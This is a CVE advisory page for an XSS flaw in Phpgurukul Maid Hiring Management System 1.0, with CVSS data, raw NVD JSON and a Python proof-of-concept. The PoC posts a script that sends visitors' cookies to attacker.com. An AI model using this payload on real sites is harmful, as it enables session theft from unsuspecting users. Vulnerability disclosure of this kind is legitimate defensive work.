Security Vulnerability Report
中文
CVE-2025-50363 CVSS 5.4 MEDIUM

CVE-2025-50363

Published: 2025-11-03 17:15:33
Last Modified: 2025-11-05 18:18:16

Description

Phpgurukul Maid Hiring Management System 1.0 is vulnerable to Cross Site Scripting (XSS) in /maid-hiring.php va the name field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:maid_hiring_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Phpgurukul Maid Hiring Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-50363 XSS PoC # Target: Phpgurukul Maid Hiring Management System 1.0 # Endpoint: /maid-hiring.php target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com/maid-hiring.php' # XSS payload to steal cookies xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' data = { 'name': xss_payload, 'address': 'Test Address', 'contact': '1234567890', 'submit': 'Submit' } try: response = requests.post(target_url, data=data, timeout=10) print(f'[+] XSS payload sent to {target_url}') print(f'[+] Status code: {response.status_code}') print('[+] Payload: ' + xss_payload) except requests.exceptions.RequestException as e: print(f'[-] Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50363", "sourceIdentifier": "[email protected]", "published": "2025-11-03T17:15:33.040", "lastModified": "2025-11-05T18:18:15.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpgurukul Maid Hiring Management System 1.0 is vulnerable to Cross Site Scripting (XSS) in /maid-hiring.php va the name field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:maid_hiring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "41ECF6D6-2D7F-47DA-9E36-EB00E8341EF2"}]}]}], "references": [{"url": "https://github.com/1h3ll/BXSS_CVE", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Adar5h16/My-CVE/blob/main/CVE-2025-50363-Exploit.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}